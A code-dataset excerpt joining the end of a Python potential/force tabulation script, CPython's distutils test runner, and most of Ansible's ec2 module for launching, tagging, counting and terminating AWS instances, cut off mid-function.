ixm = (r-R)/sigma
dix_dr = 1.0/sigma
term10 = (10.0/sigma)*(pow(ixm, -11.0) - pow(ixp, -11.0))
term4 = (4.0/sigma)*(pow(ixm, -5.0) - pow(ixp, -5.0))
product_term_b = 4.0*eps*pi*(R/r) * (0.2*term10 - 0.5*h*term4)
return product_term_a + product_term_b
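# Numerical sanity check (a sketch, not part of the original script): F(r) should
# equal -dU/dr, so a central difference of U ought to reproduce it closely, e.g.
#
# r, dr = 6.5, 1.0e-6
# dUdr = (U(r+dr, 1.0, 1.0, 6.0, 0.475) - U(r-dr, 1.0, 1.0, 6.0, 0.475))/(2*dr)
# F(r, 1.0, 1.0, 6.0, 0.475) # expected to be close to -dUdr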
class InputError(Exception):
""" A generic exception object containing a string for error reporting.
"""
def __init__(self, err_msg):
self.err_msg = err_msg
def __str__(self):
return self.err_msg
def __repr__(self):
return str(self)
if len(sys.argv) < 8:
sys.stderr.write("Error: expected 7 arguments:\n"
"\n"
"Usage: "+sys.argv[0]+" epsilon sigma R h rmin rmax N\n\n")
sys.exit(-1)
epsilon = float(sys.argv[1])
sigma = float(sys.argv[2])
R = float(sys.argv[3])
h = float(sys.argv[4])
rmin = float(sys.argv[5])
rmax = float(sys.argv[6])
N = int(sys.argv[7])
subtract_Urcut = False
if len(sys.argv) == 9:
subtract_Urcut = True
rcut = rmax
for i in range(0,N):
r = rmin + i*(rmax-rmin)/(N-1)
U_r = U(r, epsilon, sigma, R, h)
F_r = F(r, epsilon, sigma, R, h)
if subtract_Urcut:
U_r -= U(rcut, epsilon, sigma, R, h)
if (r >= rcut) or (i==N-1):
U_r = 0.0
F_r = 0.0
print(str(i+1)+' '+str(r)+' '+str(U_r)+' '+str(F_r))
|
CamelBackNotation/CarnotKE
|
refs/heads/master
|
jyhton/lib-python/2.7/test/test_distutils.py
|
139
|
"""Tests for distutils.
The tests for distutils are defined in the distutils.tests package;
the test_suite() function there returns a test suite that's ready to
be run.
"""
from test import test_support
import distutils.tests
def test_main():
test_support.run_unittest(distutils.tests.test_suite())
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
e-gob/plataforma-kioscos-autoatencion
|
refs/heads/master
|
scripts/ansible-play/.venv/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ec2.py
|
9
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: ec2
short_description: create, terminate, start or stop an instance in ec2
description:
- Creates or terminates ec2 instances.
- C(state=restarted) was added in 2.2
version_added: "0.9"
options:
key_name:
description:
- key pair to use on the instance
required: false
default: null
aliases: ['keypair']
id:
version_added: "1.1"
description:
- identifier for this instance or set of instances, so that the module will be idempotent with respect to EC2 instances.
This identifier is valid for at least 24 hours after the termination of the instance, and should not be reused for another call later on.
For details, see the description of client token at U(http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Run_Instance_Idempotency.html).
required: false
default: null
aliases: []
group:
description:
- security group (or list of groups) to use with the instance
required: false
default: null
aliases: [ 'groups' ]
group_id:
version_added: "1.1"
description:
- security group id (or list of ids) to use with the instance
required: false
default: null
aliases: []
region:
version_added: "1.2"
description:
- The AWS region to use. Must be specified if ec2_url is not used.
If not specified then the value of the EC2_REGION environment variable, if any, is used.
See U(http://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region)
required: false
default: null
aliases: [ 'aws_region', 'ec2_region' ]
zone:
version_added: "1.2"
description:
- AWS availability zone in which to launch the instance
required: false
default: null
aliases: [ 'aws_zone', 'ec2_zone' ]
instance_type:
description:
- instance type to use for the instance, see U(http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html)
required: true
default: null
aliases: []
tenancy:
version_added: "1.9"
description:
- An instance with a tenancy of "dedicated" runs on single-tenant hardware and can only be launched into a VPC.
Note that to use dedicated tenancy you MUST specify a vpc_subnet_id as well. Dedicated tenancy is not available for EC2 "micro" instances.
required: false
default: default
choices: [ "default", "dedicated" ]
aliases: []
spot_price:
version_added: "1.5"
description:
- Maximum spot price to bid. If not set, a regular on-demand instance is requested. A spot request is made with this maximum bid.
When it is filled, the instance is started.
required: false
default: null
aliases: []
spot_type:
version_added: "2.0"
description:
- Type of spot request; one of "one-time" or "persistent". Defaults to "one-time" if not supplied.
required: false
default: "one-time"
choices: [ "one-time", "persistent" ]
aliases: []
image:
description:
- I(ami) ID to use for the instance
required: true
default: null
aliases: []
kernel:
description:
- kernel I(eki) to use for the instance
required: false
default: null
aliases: []
ramdisk:
description:
- ramdisk I(eri) to use for the instance
required: false
default: null
aliases: []
wait:
description:
- wait for the instance to reach its desired state before returning. Does not wait for SSH, see 'wait_for' example for details.
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
aliases: []
spot_wait_timeout:
version_added: "1.5"
description:
- how long to wait for the spot instance request to be fulfilled
default: 600
aliases: []
count:
description:
- number of instances to launch
required: False
default: 1
aliases: []
monitoring:
version_added: "1.1"
description:
- enable detailed monitoring (CloudWatch) for instance
required: false
default: no
choices: [ "yes", "no" ]
aliases: []
user_data:
version_added: "0.9"
description:
- opaque blob of data which is made available to the ec2 instance
required: false
default: null
aliases: []
instance_tags:
version_added: "1.0"
description:
- a hash/dictionary of tags to add to the new instance or for starting/stopping instance by tag; '{"key":"value"}' and '{"key":"value","key":"value"}'
required: false
default: null
aliases: []
placement_group:
version_added: "1.3"
description:
- placement group for the instance when using EC2 Clustered Compute
required: false
default: null
aliases: []
vpc_subnet_id:
version_added: "1.1"
description:
- the subnet ID in which to launch the instance (VPC)
required: false
default: null
aliases: []
assign_public_ip:
version_added: "1.5"
description:
- when provisioning within vpc, assign a public IP address. Boto library must be 2.13.0+
required: false
default: no
choices: [ "yes", "no" ]
aliases: []
private_ip:
version_added: "1.2"
description:
- the private ip address to assign the instance (from the vpc subnet)
required: false
default: null
aliases: []
instance_profile_name:
version_added: "1.3"
description:
- Name of the IAM instance profile to use. Boto library must be 2.5.0+
required: false
default: null
aliases: []
instance_ids:
version_added: "1.3"
description:
- "list of instance ids, currently used for states: absent, running, stopped"
required: false
default: null
aliases: ['instance_id']
source_dest_check:
version_added: "1.6"
description:
- Enable or Disable the Source/Destination checks (for NAT instances and Virtual Routers)
required: false
default: yes
choices: [ "yes", "no" ]
termination_protection:
version_added: "2.0"
description:
- Enable or Disable the Termination Protection
required: false
default: no
choices: [ "yes", "no" ]
instance_initiated_shutdown_behavior:
version_added: "2.2"
description:
- Set whether AWS will Stop or Terminate an instance on shutdown. This parameter is ignored when using instance-store
images (which require termination on shutdown).
required: false
default: 'stop'
choices: [ "stop", "terminate" ]
state:
version_added: "1.3"
description:
- create or terminate instances
required: false
default: 'present'
aliases: []
choices: ['present', 'absent', 'running', 'restarted', 'stopped']
volumes:
version_added: "1.5"
description:
- a list of hash/dictionaries of volumes to add to the new instance; '[{"key":"value", "key":"value"}]'; keys allowed
are - device_name (str; required), delete_on_termination (bool; False), device_type (deprecated), ephemeral (str),
encrypted (bool; False), snapshot (str), volume_type (str), iops (int) - device_type is deprecated use volume_type,
iops must be set when volume_type='io1', ephemeral and snapshot are mutually exclusive.
required: false
default: null
aliases: []
ebs_optimized:
version_added: "1.6"
description:
- whether instance is using optimized EBS volumes, see U(http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSOptimized.html)
required: false
default: 'false'
exact_count:
version_added: "1.5"
description:
- An integer value which indicates how many instances that match the 'count_tag' parameter should be running.
Instances are either created or terminated based on this value.
required: false
default: null
aliases: []
count_tag:
version_added: "1.5"
description:
- Used with 'exact_count' to determine how many nodes based on a specific tag criteria should be running.
This can be expressed in multiple ways and is shown in the EXAMPLES section. For instance, one can request 25 servers
that are tagged with "class=webserver". The specified tag must already exist or be passed in as the 'instance_tags' option.
required: false
default: null
aliases: []
network_interfaces:
version_added: "2.0"
description:
- A list of existing network interfaces to attach to the instance at launch. When specifying existing network interfaces,
none of the assign_public_ip, private_ip, vpc_subnet_id, group, or group_id parameters may be used. (Those parameters are
for creating a new network interface at launch.)
required: false
default: null
aliases: ['network_interface']
spot_launch_group:
version_added: "2.1"
description:
- Launch group for spot request, see U(http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/how-spot-instances-work.html#spot-launch-group)
required: false
default: null
author:
- "Tim Gerla (@tgerla)"
- "Lester Wade (@lwade)"
- "Seth Vidal"
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Basic provisioning example
- ec2:
key_name: mykey
instance_type: t2.micro
image: ami-123456
wait: yes
group: webserver
count: 3
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Advanced example with tagging and CloudWatch
- ec2:
key_name: mykey
group: databases
instance_type: t2.micro
image: ami-123456
wait: yes
wait_timeout: 500
count: 5
instance_tags:
db: postgres
monitoring: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Single instance with additional IOPS volume from snapshot and volume delete on termination
- ec2:
key_name: mykey
group: webserver
instance_type: c3.medium
image: ami-123456
wait: yes
wait_timeout: 500
volumes:
- device_name: /dev/sdb
snapshot: snap-abcdef12
volume_type: io1
iops: 1000
volume_size: 100
delete_on_termination: true
monitoring: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Single instance with ssd gp2 root volume
- ec2:
key_name: mykey
group: webserver
instance_type: c3.medium
image: ami-123456
wait: yes
wait_timeout: 500
volumes:
- device_name: /dev/xvda
volume_type: gp2
volume_size: 8
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
count_tag:
Name: dbserver
exact_count: 1
# Multiple groups example
- ec2:
key_name: mykey
group: ['databases', 'internal-services', 'sshable', 'and-so-forth']
instance_type: m1.large
image: ami-6e649707
wait: yes
wait_timeout: 500
count: 5
instance_tags:
db: postgres
monitoring: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Multiple instances with additional volume from snapshot
- ec2:
key_name: mykey
group: webserver
instance_type: m1.large
image: ami-6e649707
wait: yes
wait_timeout: 500
count: 5
volumes:
- device_name: /dev/sdb
snapshot: snap-abcdef12
volume_size: 10
monitoring: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
# Dedicated tenancy example
- local_action:
module: ec2
assign_public_ip: yes
group_id: sg-1dc53f72
key_name: mykey
image: ami-6e649707
instance_type: m1.small
tenancy: dedicated
vpc_subnet_id: subnet-29e63245
wait: yes
# Spot instance example
- ec2:
spot_price: 0.24
spot_wait_timeout: 600
keypair: mykey
group_id: sg-1dc53f72
instance_type: m1.small
image: ami-6e649707
wait: yes
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
spot_launch_group: report_generators
# Examples using pre-existing network interfaces
- ec2:
key_name: mykey
instance_type: t2.small
image: ami-f005ba11
network_interface: eni-deadbeef
- ec2:
key_name: mykey
instance_type: t2.small
image: ami-f005ba11
network_interfaces: ['eni-deadbeef', 'eni-5ca1ab1e']
# Launch instances, runs some tasks
# and then terminate them
- name: Create a sandbox instance
hosts: localhost
gather_facts: False
vars:
key_name: my_keypair
instance_type: m1.small
security_group: my_securitygroup
image: my_ami_id
region: us-east-1
tasks:
- name: Launch instance
ec2:
key_name: "{{ keypair }}"
group: "{{ security_group }}"
instance_type: "{{ instance_type }}"
image: "{{ image }}"
wait: true
region: "{{ region }}"
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
register: ec2
- name: Add new instance to host group
add_host:
hostname: "{{ item.public_ip }}"
groupname: launched
with_items: "{{ ec2.instances }}"
- name: Wait for SSH to come up
wait_for:
host: "{{ item.public_dns_name }}"
port: 22
delay: 60
timeout: 320
state: started
with_items: "{{ ec2.instances }}"
- name: Configure instance(s)
hosts: launched
become: True
gather_facts: True
roles:
- my_awesome_role
- my_awesome_test
- name: Terminate instances
hosts: localhost
connection: local
tasks:
- name: Terminate instances that were previously launched
ec2:
state: 'absent'
instance_ids: '{{ ec2.instance_ids }}'
# Start a few existing instances, run some tasks
# and stop the instances
- name: Start sandbox instances
hosts: localhost
gather_facts: false
connection: local
vars:
instance_ids:
- 'i-xxxxxx'
- 'i-xxxxxx'
- 'i-xxxxxx'
region: us-east-1
tasks:
- name: Start the sandbox instances
ec2:
instance_ids: '{{ instance_ids }}'
region: '{{ region }}'
state: running
wait: True
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
roles:
- do_neat_stuff
- do_more_neat_stuff
- name: Stop sandbox instances
hosts: localhost
gather_facts: false
connection: local
vars:
instance_ids:
- 'i-xxxxxx'
- 'i-xxxxxx'
- 'i-xxxxxx'
region: us-east-1
tasks:
- name: Stop the sandbox instances
ec2:
instance_ids: '{{ instance_ids }}'
region: '{{ region }}'
state: stopped
wait: True
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
#
# Start stopped instances specified by tag
#
- local_action:
module: ec2
instance_tags:
Name: ExtraPower
state: running
#
# Restart instances specified by tag
#
- local_action:
module: ec2
instance_tags:
Name: ExtraPower
state: restarted
#
# Enforce that 5 instances with a tag "foo" are running
# (Highly recommended!)
#
- ec2:
key_name: mykey
instance_type: c1.medium
image: ami-40603AD1
wait: yes
group: webserver
instance_tags:
foo: bar
exact_count: 5
count_tag: foo
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
#
# Enforce that 5 instances named "database" with a "dbtype" of "postgres" are running
#
- ec2:
key_name: mykey
instance_type: c1.medium
image: ami-40603AD1
wait: yes
group: webserver
instance_tags:
Name: database
dbtype: postgres
exact_count: 5
count_tag:
Name: database
dbtype: postgres
vpc_subnet_id: subnet-29e63245
assign_public_ip: yes
#
# count_tag complex argument examples
#
# instances with tag foo
count_tag:
foo:
# instances with tag foo=bar
count_tag:
foo: bar
# instances with tags foo=bar & baz
count_tag:
foo: bar
baz:
# instances with tags foo & bar & baz=bang
count_tag:
- foo
- bar
- baz: bang
'''
import traceback
import time
from ast import literal_eval
from ansible.module_utils.six import get_function_code, string_types
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import get_aws_connection_info, ec2_argument_spec, ec2_connect
from distutils.version import LooseVersion
try:
import boto.ec2
from boto.ec2.blockdevicemapping import BlockDeviceType, BlockDeviceMapping
from boto.exception import EC2ResponseError
from boto import connect_ec2_endpoint
from boto import connect_vpc
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def find_running_instances_by_count_tag(module, ec2, vpc, count_tag, zone=None):
# get reservations for instances that match tag(s) and are running
reservations = get_reservations(module, ec2, vpc, tags=count_tag, state="running", zone=zone)
instances = []
for res in reservations:
if hasattr(res, 'instances'):
for inst in res.instances:
instances.append(inst)
return reservations, instances
def _set_none_to_blank(dictionary):
result = dictionary
for k in result:
if isinstance(result[k], dict):
result[k] = _set_none_to_blank(result[k])
elif not result[k]:
result[k] = ""
return result
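# For example (a sketch): {'Name': 'db', 'env': None} -> {'Name': 'db', 'env': ''}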
def get_reservations(module, ec2, vpc, tags=None, state=None, zone=None):
# TODO: filters do not work with tags that have underscores
filters = dict()
vpc_subnet_id = module.params.get('vpc_subnet_id')
vpc_id = None
if vpc_subnet_id:
filters.update({"subnet-id": vpc_subnet_id})
if vpc:
vpc_id = vpc.get_all_subnets(subnet_ids=[vpc_subnet_id])[0].vpc_id
if vpc_id:
filters.update({"vpc-id": vpc_id})
if tags is not None:
if isinstance(tags, str):
try:
tags = literal_eval(tags)
except:
pass
# if string, we only care that a tag of that name exists
if isinstance(tags, str):
filters.update({"tag-key": tags})
# if list, append each item to filters
if isinstance(tags, list):
for x in tags:
if isinstance(x, dict):
x = _set_none_to_blank(x)
filters.update(dict(("tag:" + tn, tv) for (tn, tv) in x.items()))
else:
filters.update({"tag-key": x})
# if dict, add the key and value to the filter
if isinstance(tags, dict):
tags = _set_none_to_blank(tags)
filters.update(dict(("tag:" + tn, tv) for (tn, tv) in tags.items()))
if state:
# http://stackoverflow.com/questions/437511/what-are-the-valid-instancestates-for-the-amazon-ec2-api
filters.update({'instance-state-name': state})
if zone:
filters.update({'availability-zone': zone})
if module.params.get('id'):
filters['client-token'] = module.params['id']
results = ec2.get_all_instances(filters=filters)
return results
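# For example (a sketch): tags={'Name': 'db'} together with state='running' builds
# filters={'tag:Name': 'db', 'instance-state-name': 'running'} before the
# get_all_instances call (plus subnet/vpc/zone/client-token filters when set).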
def get_instance_info(inst):
"""
Retrieves instance information from an instance
ID and returns it as a dictionary
"""
instance_info = {'id': inst.id,
'ami_launch_index': inst.ami_launch_index,
'private_ip': inst.private_ip_address,
'private_dns_name': inst.private_dns_name,
'public_ip': inst.ip_address,
'dns_name': inst.dns_name,
'public_dns_name': inst.public_dns_name,
'state_code': inst.state_code,
'architecture': inst.architecture,
'image_id': inst.image_id,
'key_name': inst.key_name,
'placement': inst.placement,
'region': inst.placement[:-1],
'kernel': inst.kernel,
'ramdisk': inst.ramdisk,
'launch_time': inst.launch_time,
'instance_type': inst.instance_type,
'root_device_type': inst.root_device_type,
'root_device_name': inst.root_device_name,
'state': inst.state,
'hypervisor': inst.hypervisor,
'tags': inst.tags,
'groups': dict((group.id, group.name) for group in inst.groups),
}
try:
instance_info['virtualization_type'] = getattr(inst, 'virtualization_type')
except AttributeError:
instance_info['virtualization_type'] = None
try:
instance_info['ebs_optimized'] = getattr(inst, 'ebs_optimized')
except AttributeError:
instance_info['ebs_optimized'] = False
try:
bdm_dict = {}
bdm = getattr(inst, 'block_device_mapping')
for device_name in bdm.keys():
bdm_dict[device_name] = {
'status': bdm[device_name].status,
'volume_id': bdm[device_name].volume_id,
'delete_on_termination': bdm[device_name].delete_on_termination
}
instance_info['block_device_mapping'] = bdm_dict
except AttributeError:
instance_info['block_device_mapping'] = False
try:
instance_info['tenancy'] = getattr(inst, 'placement_tenancy')
except AttributeError:
instance_info['tenancy'] = 'default'
return instance_info
def boto_supports_associate_public_ip_address(ec2):
"""
Check if Boto library has associate_public_ip_address in the NetworkInterfaceSpecification
class. Added in Boto 2.13.0
ec2: authenticated ec2 connection object
Returns:
True if Boto library accepts associate_public_ip_address argument, else false
"""
try:
network_interface = boto.ec2.networkinterface.NetworkInterfaceSpecification()
getattr(network_interface, "associate_public_ip_address")
return True
except AttributeError:
return False
def boto_supports_profile_name_arg(ec2):
"""
Check if Boto library has instance_profile_name argument. instance_profile_name has been added in Boto 2.5.0
ec2: authenticated ec2 connection object
Returns:
True if Boto library accept instance_profile_name argument, else false
"""
run_instances_method = getattr(ec2, 'run_instances')
return 'instance_profile_name' in get_function_code(run_instances_method).co_varnames
def boto_supports_volume_encryption():
"""
Check if Boto library supports encryption of EBS volumes (added in 2.29.0)
Returns:
True if boto library has the named param as an argument on the request_spot_instances method, else False
"""
return hasattr(boto, 'Version') and LooseVersion(boto.Version) >= LooseVersion('2.29.0')
def create_block_device(module, ec2, volume):
# Not aware of a way to determine this programmatically
# http://aws.amazon.com/about-aws/whats-new/2013/10/09/ebs-provisioned-iops-maximum-iops-gb-ratio-increased-to-30-1/
MAX_IOPS_TO_SIZE_RATIO = 30
# device_type has been used historically to represent volume_type,
# however ec2_vol uses volume_type, as does the BlockDeviceType, so
# we add handling for either/or but not both
if all(key in volume for key in ['device_type', 'volume_type']):
module.fail_json(msg='device_type is a deprecated name for volume_type. Do not use both device_type and volume_type')
# get whichever one is set, or NoneType if neither are set
volume_type = volume.get('device_type') or volume.get('volume_type')
if 'snapshot' not in volume and 'ephemeral' not in volume:
if 'volume_size' not in volume:
module.fail_json(msg='Size must be specified when creating a new volume or modifying the root volume')
if 'snapshot' in volume:
if volume_type == 'io1' and 'iops' not in volume:
module.fail_json(msg='io1 volumes must have an iops value set')
if 'iops' in volume:
snapshot = ec2.get_all_snapshots(snapshot_ids=[volume['snapshot']])[0]
size = volume.get('volume_size', snapshot.volume_size)
if int(volume['iops']) > MAX_IOPS_TO_SIZE_RATIO * size:
module.fail_json(msg='IOPS must be at most %d times greater than size' % MAX_IOPS_TO_SIZE_RATIO)
if 'encrypted' in volume:
module.fail_json(msg='You can not set encryption when creating a volume from a snapshot')
if 'ephemeral' in volume:
if 'snapshot' in volume:
module.fail_json(msg='Cannot set both ephemeral and snapshot')
if boto_supports_volume_encryption():
return BlockDeviceType(snapshot_id=volume.get('snapshot'),
ephemeral_name=volume.get('ephemeral'),
size=volume.get('volume_size'),
volume_type=volume_type,
delete_on_termination=volume.get('delete_on_termination', False),
iops=volume.get('iops'),
encrypted=volume.get('encrypted', None))
else:
return BlockDeviceType(snapshot_id=volume.get('snapshot'),
ephemeral_name=volume.get('ephemeral'),
size=volume.get('volume_size'),
volume_type=volume_type,
delete_on_termination=volume.get('delete_on_termination', False),
iops=volume.get('iops'))
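# For example (a sketch): a volume item such as
# {'device_name': '/dev/sdb', 'volume_type': 'gp2', 'volume_size': 10,
# 'delete_on_termination': True}
# maps onto BlockDeviceType(size=10, volume_type='gp2', delete_on_termination=True).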
def boto_supports_param_in_spot_request(ec2, param):
"""
Check if Boto library has a <param> in its request_spot_instances() method. For example, the placement_group parameter wasn't added until 2.3.0.
ec2: authenticated ec2 connection object
Returns:
True if boto library has the named param as an argument on the request_spot_instances method, else False
"""
method = getattr(ec2, 'request_spot_instances')
return param in get_function_code(method).co_varnames
def await_spot_requests(module, ec2, spot_requests, count):
"""
Wait for a group of spot requests to be fulfilled, or fail.
module: Ansible module object
ec2: authenticated ec2 connection object
spot_requests: boto.ec2.spotinstancerequest.SpotInstanceRequest object returned by ec2.request_spot_instances
count: Total number of instances to be created by the spot requests
Returns:
list of instance ID's created by the spot request(s)
"""
spot_wait_timeout = int(module.params.get('spot_wait_timeout'))
wait_complete = time.time() + spot_wait_timeout
spot_req_inst_ids = dict()
while time.time() < wait_complete:
reqs = ec2.get_all_spot_instance_requests()
for sirb in spot_requests:
if sirb.id in spot_req_inst_ids:
continue
for sir in reqs:
if sir.id != sirb.id:
continue # this is not our spot instance
if sir.instance_id is not None:
spot_req_inst_ids[sirb.id] = sir.instance_id
elif sir.state == 'open':
continue # still waiting, nothing to do here
elif sir.state == 'active':
continue # Instance is created already, nothing to do here
elif sir.state == 'failed':
module.fail_json(msg="Spot instance request %s failed with status %s and fault %s:%s" % (
sir.id, sir.status.code, sir.fault.code, sir.fault.message))
elif sir.state == 'cancelled':
module.fail_json(msg="Spot instance request %s was cancelled before it could be fulfilled." % sir.id)
elif sir.state == 'closed':
# instance is terminating or marked for termination
# this may be intentional on the part of the operator,
# or it may have been terminated by AWS due to capacity,
# price, or group constraints; in this case, we'll fail
# the module if the reason for the state is anything
# other than termination by user. Codes are documented at
# http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/spot-bid-status.html
if sir.status.code == 'instance-terminated-by-user':
# do nothing, since the user likely did this on purpose
pass
else:
spot_msg = "Spot instance request %s was closed by AWS with the status %s and fault %s:%s"
module.fail_json(msg=spot_msg % (sir.id, sir.status.code, sir.fault.code, sir.fault.message))
if len(spot_req_inst_ids) < count:
time.sleep(5)
else:
return list(spot_req_inst_ids.values())
module.fail_json(msg="wait for spot requests timeout on %s" % time.asctime())
def enforce_count(module, ec2, vpc):
exact_count = module.params.get('exact_count')
count_tag = module.params.get('count_tag')
zone = module.params.get('zone')
# fail here if the exact count was specified without filtering
# on a tag, as this may lead to an undesired removal of instances
if exact_count and count_tag is None:
module.fail_json(msg="you must use the 'count_tag' option with exact_count")
reservations, instances = find_running_instances_by_count_tag(module, ec2, vpc, count_tag, zone)
changed = None
checkmode = False
instance_dict_array = []
changed_instance_ids = None
if len(instances) == exact_count:
changed = False
elif len(instances) < exact_count:
changed = True
to_create = exact_count - len(instances)
if not checkmode:
(instance_dict_array, changed_instance_ids, changed) \
= create_instances(module, ec2, vpc, override_count=to_create)
for inst in instance_dict_array:
instances.append(inst)
elif len(instances) > exact_count:
changed = True
to_remove = len(instances) - exact_count
if not checkmode:
all_instance_ids = sorted([x.id for x in instances])
remove_ids = all_instance_ids[0:to_remove]
instances = [x for x in instances if x.id not in remove_ids]
(changed, instance_dict_array, changed_instance_ids) \
= terminate_instances(module, ec2, remove_ids)
terminated_list = []
for inst in instance_dict_array:
inst['state'] = "terminated"
terminated_list.append(inst)
instance_dict_array = terminated_list
# ensure all instances are dictionaries
all_instances = []
for inst in instances:
if not isinstance(inst, dict):
inst = get_instance_info(inst)
all_instances.append(inst)
return (all_instances, instance_dict_array, changed_instance_ids, changed)
def create_instances(module, ec2, vpc, override_count=None):
"""
Creates new instances
module : AnsibleModule object
ec2: authenticated ec2 connection object
Returns:
A list of dictionaries with instance information
about the instances that were launched
"""
key_name = module.params.get('key_name')
id = module.params.get('id')
group_name = module.params.get('group')
group_id = module.params.get('group_id')
zone = module.params.get('zone')
instance_type = module.params.get('instance_type')
tenancy = module.params.get('tenancy')
spot_price = module.params.get('spot_price')
spot_type = module.params.get('spot_type')
image = module.params.get('image')
if override_count:
count = override_count
else:
count = module.params.get('count')
monitoring = module.params.get('monitoring')
kernel = module.params.get('kernel')
ramdisk = module.params.get('ramdisk')
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
spot_wait_timeout = int(module.params.get('spot_wait_timeout'))
placement_group = module.params.get('placement_group')
user_data = module.params.get('user_data')
instance_tags = module.params.get('instance_tags')
vpc_subnet_id = module.params.get('vpc_subnet_id')
assign_public_ip = module.boolean(module.params.get('assign_public_ip'))
private_ip = module.params.get('private_ip')
instance_profile_name = module.params.get('instance_profile_name')
volumes = module.params.get('volumes')
ebs_optimized = module.params.get('ebs_optimized')
exact_count = module.params.get('exact_count')
count_tag = module.params.get('count_tag')
source_dest_check = module.boolean(module.params.get('source_dest_check'))
termination_protection = module.boolean(module.params.get('termination_protection'))
network_interfaces = module.params.get('network_interfaces')
spot_launch_group = module.params.get('spot_launch_group')
instance_initiated_shutdown_behavior = module.params.get('instance_initiated_shutdown_behavior')
vpc_id = None
if vpc_subnet_id:
if not vpc:
module.fail_json(msg="region must be specified")
else:
vpc_id = vpc.get_all_subnets(subnet_ids=[vpc_subnet_id])[0].vpc_id
else:
vpc_id = None
try:
# Here we try to lookup the group id from the security group name - if group is set.
if group_name:
if vpc_id:
grp_details = ec2.get_all_security_groups(filters={'vpc_id': vpc_id})
else:
grp_details = ec2.get_all_security_groups()
if isinstance(group_name, string_types):
group_name = [group_name]
unmatched = set(group_name).difference(str(grp.name) for grp in grp_details)
if len(unmatched) > 0:
module.fail_json(msg="The following group names are not valid: %s" % ', '.join(unmatched))
group_id = [str(grp.id) for grp in grp_details if str(grp.name) in group_name]
# Now we try to lookup the group id testing if group exists.
elif group_id:
# wrap the group_id in a list if it's not one already
if isinstance(group_id, string_types):
group_id = [group_id]
grp_details = ec2.get_all_security_groups(group_ids=group_id)
group_name = [grp_item.name for grp_item in grp_details]
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg=str(e))
# Look up any instances that match our run id.
running_instances = []
count_remaining = int(count)
if id is not None:
filter_dict = {'client-token': id, 'instance-state-name': 'running'}
previous_reservations = ec2.get_all_instances(None, filter_dict)
for res in previous_reservations:
for prev_instance in res.instances:
running_instances.append(prev_instance)
count_remaining = count_remaining - len(running_instances)
# Both min_count and max_count equal the count parameter, which makes the launch request explicit: we want exactly count instances, or the request fails.
if count_remaining == 0:
changed = False
else:
changed = True
try:
params = {'image_id': image,
'key_name': key_name,
'monitoring_enabled': monitoring,
'placement': zone,
'instance_type': instance_type,
'kernel_id': kernel,
'ramdisk_id': ramdisk,
'user_data': user_data}
if ebs_optimized:
params['ebs_optimized'] = ebs_optimized
# 'tenancy' always has a default value, but it is not a valid parameter for spot instance request
if not spot_price:
params['tenancy'] = tenancy
if boto_supports_profile_name_arg(ec2):
params['instance_profile_name'] = instance_profile_name
else:
if instance_profile_name is not None:
module.fail_json(
msg="instance_profile_name parameter requires Boto version 2.5.0 or higher")
if assign_public_ip:
if not boto_supports_associate_public_ip_address(ec2):
module.fail_json(
msg="assign_public_ip parameter requires Boto version 2.13.0 or higher.")
elif not vpc_subnet_id:
module.fail_json(
msg="assign_public_ip only available with vpc_subnet_id")
else:
if private_ip:
interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(
subnet_id=vpc_subnet_id,
private_ip_address=private_ip,
groups=group_id,
associate_public_ip_address=assign_public_ip)
else:
interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(
subnet_id=vpc_subnet_id,
groups=group_id,
associate_public_ip_address=assign_public_ip)
interfaces = boto.ec2.networkinterface.NetworkInterfaceCollection(interface)
params['network_interfaces'] = interfaces
else:
if network_interfaces:
if isinstance(network_interfaces, string_types):
network_interfaces = [network_interfaces]
interfaces = []
for i, network_interface_id in enumerate(network_interfaces):
interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(
network_interface_id=network_interface_id,
device_index=i)
interfaces.append(interface)
params['network_interfaces'] = \
boto.ec2.networkinterface.NetworkInterfaceCollection(*interfaces)
else:
params['subnet_id'] = vpc_subnet_id
if vpc_subnet_id:
params['security_group_ids'] = group_id
else:
params['security_groups'] = group_name
if volumes:
bdm = BlockDeviceMapping()
for volume in volumes:
if 'device_name' not in volume:
module.fail_json(msg='Device name must be set for volume')
# Minimum volume size is 1GB. We'll use volume size explicitly set to 0
# to be a signal not to create this volume
if 'volume_size' not in volume or int(volume['volume_size']) > 0:
